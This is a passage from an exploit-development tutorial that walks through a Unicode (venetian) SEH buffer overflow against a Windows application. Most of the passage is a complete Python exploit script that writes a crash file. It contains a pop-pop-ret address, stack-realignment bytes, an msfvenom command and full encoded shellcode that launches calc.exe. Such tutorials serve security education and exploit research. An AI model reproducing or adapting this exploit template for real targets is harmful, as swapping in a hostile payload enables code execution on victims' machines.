buf += b"\x05\xFF\x10"   # ADD EAX, 0x1000FF00
buf += b"\x75"           # Unicode NOP
buf += b"\x2d\xEA\x10"   # SUB EAX, 0x1000EA00
buf += b"\x75"           # Unicode NOP

buf += b"\x71" * 595     # Unicode NOP sled up to the address held in EAX

buf += b"\x44" * (5000 - len(buf))

f.write(buf)
f.close()


Finally, all we have to do is generate our shellcode and add it to the exploit code, and the exploit will be complete.

Finishing the Exploit

In order to create our payload, we will once again be using MSFVenom. To do that, boot up an instance of Kali or wherever you keep a copy of MSFVenom, and run the following command to generate our payload:

Command:
msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX -f python

MSFVenom Payload Generation

After we copy this into our exploit code, it should look something like the following:

f = open("crash-6.txt", "wb")

buf = b""
buf += b"\x41" * 1019
buf += b"\x71\x71"       # Unicode NOP
buf += b"\xB3\x48"       # 0x004800b3 | pop ecx, pop ebp, ret

# realigning stack
buf += b"\x75"           # Unicode NOP
buf += b"\x54"           # PUSH ESP
buf += b"\x75"           # Unicode NOP
buf += b"\x58"           # POP EAX
buf += b"\x75"           # Unicode NOP
buf += b"\x05\xFF\x10"   # ADD EAX, 0x1000FF00
buf += b"\x75"           # Unicode NOP
buf += b"\x2d\xEA\x10"   # SUB EAX, 0x1000EA00
buf += b"\x75"           # Unicode NOP

buf += b"\x71" * 595     # Unicode NOP sled up to the address held in EAX

# msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX -f python
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51"
buf += b"\x41\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44"
buf += b"\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41"
buf += b"\x51\x41\x49\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50"
buf += b"\x41\x5a\x31\x41\x49\x31\x41\x49\x41\x49\x41\x4a\x31"
buf += b"\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38\x41\x41\x50"
buf += b"\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"
buf += b"\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51"
buf += b"\x49\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42"
buf += b"\x41\x42\x33\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x4b"
buf += b"\x4c\x59\x58\x35\x32\x4b\x50\x4b\x50\x4d\x30\x31\x50"
buf += b"\x43\x59\x4b\x35\x50\x31\x39\x30\x42\x44\x54\x4b\x50"
buf += b"\x50\x30\x30\x54\x4b\x42\x32\x4c\x4c\x54\x4b\x31\x42"
buf += b"\x4c\x54\x54\x4b\x34\x32\x4f\x38\x4c\x4f\x48\x37\x50"
buf += b"\x4a\x4f\x36\x50\x31\x4b\x4f\x36\x4c\x4f\x4c\x31\x51"
buf += b"\x43\x4c\x4c\x42\x4e\x4c\x4f\x30\x39\x31\x38\x4f\x4c"
buf += b"\x4d\x4d\x31\x59\x37\x4a\x42\x4a\x52\x42\x32\x51\x47"
buf += b"\x34\x4b\x50\x52\x4c\x50\x34\x4b\x30\x4a\x4f\x4c\x54"
buf += b"\x4b\x30\x4c\x4e\x31\x34\x38\x4b\x33\x30\x48\x4b\x51"
buf += b"\x4a\x31\x30\x51\x54\x4b\x50\x59\x4d\x50\x4d\x31\x5a"
buf += b"\x33\x44\x4b\x31\x39\x4c\x58\x39\x53\x4e\x5a\x30\x49"
buf += b"\x44\x4b\x4e\x54\x34\x4b\x4d\x31\x4a\x36\x4e\x51\x4b"
buf += b"\x4f\x36\x4c\x59\x31\x38\x4f\x4c\x4d\x4b\x51\x49\x37"
buf += b"\x4e\x58\x4b\x30\x52\x55\x4b\x46\x4c\x43\x43\x4d\x4c"
buf += b"\x38\x4f\x4b\x43\x4d\x4e\x44\x42\x55\x5a\x44\x30\x58"
buf += b"\x54\x4b\x52\x38\x4e\x44\x4b\x51\x59\x43\x31\x56\x34"
buf += b"\x4b\x4c\x4c\x50\x4b\x34\x4b\x50\x58\x4d\x4c\x4b\x51"
buf += b"\x39\x43\x44\x4b\x4d\x34\x44\x4b\x4b\x51\x4a\x30\x35"
buf += b"\x39\x30\x44\x4d\x54\x4d\x54\x31\x4b\x51\x4b\x53\x31"
buf += b"\x50\x59\x50\x5a\x32\x31\x4b\x4f\x49\x50\x31\x4f\x31"
buf += b"\x4f\x31\x4a\x34\x4b\x4e\x32\x4a\x4b\x54\x4d\x51\x4d"
buf += b"\x51\x5a\x4b\x51\x54\x4d\x54\x45\x46\x52\x4b\x50\x4d"
buf += b"\x30\x4b\x50\x32\x30\x33\x38\x4e\x51\x34\x4b\x42\x4f"
buf += b"\x34\x47\x4b\x4f\x49\x45\x57\x4b\x5a\x50\x38\x35\x45"
buf += b"\x52\x52\x36\x42\x48\x37\x36\x34\x55\x47\x4d\x55\x4d"
buf += b"\x4b\x4f\x4a\x35\x4f\x4c\x4c\x46\x33\x4c\x4c\x4a\x43"
buf += b"\x50\x4b\x4b\x39\x50\x33\x45\x4d\x35\x47\x4b\x50\x47"
buf += b"\x4e\x33\x42\x52\x42\x4f\x31\x5a\x4b\x50\x50\x53\x4b"
buf += b"\x4f\x49\x45\x52\x43\x53\x31\x42\x4c\x53\x33\x4e\x4e"
buf += b"\x32\x45\x34\x38\x53\x35\x4b\x50\x41\x41"

buf += b"\x44" * (5000 - len(buf))

f.write(buf)
f.close()


Now all we have to do is run the code, copy the contents of crash-6.txt to the clipboard, paste them into our application, and watch calc.exe pop up for us.

Completed exploit
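If the exploit does not fire, one thing worth ruling out is a payload byte that does not survive the Unicode conversion. The check below is a sketch that assumes the x86/unicode_upper encoder restricts its output to uppercase letters and digits, which is what the encoder name suggests and what the bytes shown above appear to follow; the function name is hypothetical.

```python
import string

# Byte values for A-Z and 0-9.
ALLOWED = set((string.ascii_uppercase + string.digits).encode("ascii"))

def disallowed_bytes(payload: bytes) -> list[int]:
    """Return offsets of bytes outside the uppercase alphanumeric set."""
    return [i for i, b in enumerate(payload) if b not in ALLOWED]

# First line of the encoded payload shown in the article.
sample = b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51"
print(disallowed_bytes(sample))            # []
print(disallowed_bytes(b"\x90\x41\x00"))   # [0, 2]
```

An empty list means every byte in the checked range is a plain ASCII character that widens predictably to the same byte followed by a null.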
 

Conclusion

For a substantial amount of time, it was believed that Unicode overflows were not exploitable and that they could only be used to cause a denial of service condition. However, in 2002, Chris Anley published a paper demonstrating this belief to be false. If you would like some further reading on this topic, I would suggest the paper Building IA32 'Unicode-Proof' Shellcodes, published in Phrack in 2003.